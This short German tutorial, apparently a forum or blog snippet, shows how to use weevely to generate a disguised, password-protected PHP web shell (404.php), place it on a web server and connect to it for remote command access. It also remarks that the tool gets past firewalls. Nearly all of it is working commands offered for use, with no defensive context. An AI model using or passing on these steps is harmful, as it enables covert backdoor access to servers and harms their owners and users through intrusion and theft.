Mit weevely kannst du ein nettes Payload bauen:
weevely generate 12345 /root/Desktop/404.php
Dies baut eine php-Datei namens 404.php in den Ordner /root/Desktop/ mit dem Passwort 12345
Dieses File so auf den Webserver kopieren das es erreichbar ist.
Beispiel: http://192.180.190.3/404.php - oder in einen Unterordner.
Aufrufen und verwenden:
weevely http://192.168.136.191/404.php 12345
…und du bist auf dem Server :)
Als Beweis versuche ein whoiam
Das Tool lässt sich auch wunderbar dazu verwenden trotz Firewall auf seinen eigenen Server zu kommen.